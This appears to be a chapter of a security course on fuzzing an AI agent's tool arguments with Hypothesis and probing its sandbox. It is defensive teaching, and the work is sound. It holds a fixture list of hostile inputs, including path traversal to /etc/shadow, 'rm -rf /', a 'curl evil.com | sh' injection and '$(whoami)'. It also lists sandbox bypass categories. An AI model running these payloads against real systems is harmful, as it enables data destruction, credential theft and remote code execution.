Skip to content

English · Español

04 — Fuzzing tool args and reviewing the sandbox

🇪🇸 El fuzzer no piensa como un atacante; genera entradas aleatorias y deja que el sistema falle. Combinado con un sandbox (Phase 32) que limita lo que las tools pueden hacer, las dos capas se compensan: el fuzzer encuentra entradas inesperadas, el sandbox limita el daño cuando alguna se cuela.


Why fuzz when you have schemas

Phase 31 defines tool argument schemas (JSON Schema / Pydantic). Phase 30 enforces output schemas. Both are whitelists of valid shapes. So why fuzz?

  • Schemas describe shape, not semantics. A path: str field passes the schema as "../../../etc/passwd". A verb: str field passes as "work; rm -rf /". The schema is satisfied; the behavior is not.
  • Schemas are written by humans. Humans miss edge cases: Unicode normalization, NULL bytes, very long strings, integer overflow, empty strings.
  • Fuzz finds violations the writer didn't think of. That's the whole point.

The fuzzer is downstream of the schema: it generates inputs that pass schema validation but might still violate behavior expectations.

Hypothesis: property-based testing as fuzzing

hypothesis is the standard Python library for property-based testing. It shrinks inputs to minimal failing examples, which makes findings actionable.

Basic shape for the grammar tutor:

from hypothesis import given, strategies as st

@given(
    verb=st.text(min_size=1, max_size=50),
    tense=st.sampled_from(["infinitive", "present_simple", "past_simple",
                           "past_participle", "future_will", "future_going_to"]),
    person=st.sampled_from(["1sg", "2sg", "3sg"]),
)
def test_agent_tool_args_are_safe(verb, tense, person):
    result = agent.invoke({"verb": verb, "tense": tense, "person": person})
    assert result.status in {"ok", "rejected"}
    assert "rm -rf" not in result.diagnostic   # no command leakage
    assert no_path_escape(result)               # no fs access outside KB

What Hypothesis does:

  1. Generates random verb strings from the text() strategy — including Unicode, control chars, very long strings.
  2. Runs the test. If it fails, shrinks the input: tries to find the smallest verb that still fails.
  3. Persists the failing example to .hypothesis/examples/ so the same failure is retried on every run.

The result of a 60-second fuzz run is, ideally, at least one failing example — confirming the agent has at least one corner case its schema didn't catch.

Strategies tailored to the threat model

Generic strategies (st.text()) find some issues. Targeted strategies find more:

malicious_paths = st.sampled_from([
    "../../../etc/passwd",
    "..\\..\\..\\windows\\system32\\config\\sam",
    "/dev/null",
    "/etc/shadow",
    "file:///etc/passwd",
    "\\\\server\\share",
])

command_injection = st.sampled_from([
    "verb; rm -rf /",
    "verb && curl evil.com | sh",
    "$(whoami)",
    "`id`",
    "verb\nmalicious",
])

st.one_of(malicious_paths, command_injection, st.text())

These are adversarial fixtures mixed into the generation pool. The fuzzer becomes part property-based, part dictionary-driven.

What "schema violation" means here

The Phase 37 DoD requires the fuzzer to find ≥1 schema violation in 60 seconds. "Schema violation" means:

  • The agent's tool response doesn't match its declared output schema (Phase 30).
  • The agent raises an unexpected exception (not ValidationError, not ToolRejected).
  • The agent's response contains a string that looks like leakage from a tool error (e.g., a filesystem path the user couldn't have known).

The fuzzer doesn't need to produce a security incident — it needs to produce a behavioral surprise. Surprises are the leading indicator of latent vulnerabilities.

The Phase 32 sandbox: what we're reviewing

Phase 32 wraps tool execution in a capability-restricted environment:

Capability Granted? Mechanism
Filesystem read, data/kb/grammar-rules/ Yes Path canonicalization + prefix check
Filesystem read, anywhere else No Same check rejects
Filesystem write No Tools have no write APIs
Network access No No requests/httpx imports allowed in tool code
Subprocess spawn No subprocess, os.system, os.popen blocked by audit hook
Arbitrary Python eval No No eval, exec, compile in tool code
CPU time Limited signal.SIGXCPU after 5 seconds wall-clock
Memory Limited resource.setrlimit(RLIMIT_AS, ...)

Phase 37's job is not to build this sandbox (Phase 32 already did) but to test it adversarially:

  • Try path traversal — does canonicalization actually canonicalize?
  • Try CPU exhaustion — does the timeout fire?
  • Try memory exhaustion — does the rlimit hold?
  • Try shell metacharacters — do they reach a shell? (They shouldn't; there's no shell=True anywhere.)
  • Try side channels — DNS resolution, timing oracles.

Each test that the sandbox passes gets a regression entry. Each test it fails becomes the lead story of the report.

Sandbox bypass categories to test

From the literature on sandboxing, the categories most often missed:

  1. TOCTOU (time-of-check, time-of-use). Path is canonicalized at check time; an attacker swaps a symlink before use. Hard to exploit in this single-process setup but worth a test.
  2. Encoding tricks. UTF-8 normalization, URL-encoding, double-encoding. ..%2f..%2f vs ../... The canonicalizer must normalize before the prefix check.
  3. Case folding. Windows-style case-insensitive filesystems: DATA/KB/... vs data/kb/.... (Less relevant on Borja's Fedora box but worth a one-line test.)
  4. Resource exhaustion as DoS. Even if no escape, can a tool argument cause a 30-minute hang? The 5-second timeout should catch this.
  5. Error-message leakage. A failed tool call returns an error string. If that string contains /home/borja/.../secrets, the sandbox failed to redact.

The lab/03-tool-abuse-and-fuzz.md walks through each as a concrete test.

What the sandbox does not protect against

A blunt list:

  • Logical bugs in the agent itself. If the agent's tool routing has a bug that calls the wrong tool with the wrong args, the sandbox doesn't help.
  • Information that the tool is supposed to return. A KB lookup tool returns KB content; if a poisoned chunk is in the KB (Lab 01), the sandbox lets it through because it's a legitimate read.
  • Compromise of the sandbox itself. If signal.SIGXCPU is monkey-patched by attacker code that already runs in-process, the timeout is moot. The sandbox assumes the agent code path is trusted; only tool arguments are untrusted.
  • The model. The sandbox wraps tools, not the LLM forward pass. A model that hallucinates a malicious response is a separate problem (Phase 30 schema enforcement).

This list belongs in the THREATS.md rows Borja writes during phase execution: the sandbox's coverage and its gaps both need documentation.

The two-layer story

Putting the four theory chapters together:

  1. Boundary layer: schemas (Phase 30) define what's allowed in/out.
  2. Sandbox layer: capability restrictions (Phase 32) limit blast radius if boundary fails.
  3. Audit layer: redacted logs (Phase 34) catch the attempt without storing the payload.
  4. Tripwire layer: MANIFEST.json verification (Phase 37 lab 04) catches tampering.

Fuzzing exercises layer 1 and probes layer 2. It does not test layer 3 or 4 — those need their own checks.

One-paragraph recap

Schemas describe shape; fuzzers find shape-passing inputs that nonetheless misbehave. hypothesis plus a small dictionary of malicious payloads is the cheapest, highest-yield testing tool in the phase. The Phase 32 sandbox is the layer that limits the damage when the fuzzer's findings escape the schema; Phase 37's job is to probe the sandbox adversarially, not to build it. The DoD's "≥1 schema violation in 60 seconds" is set deliberately low — even a carefully designed schema has corner cases, and not finding one in 60 seconds is itself a finding worth investigating.

Next: lab/00-prompt-injection-direct.md — the "pirate" payload and its mitigation.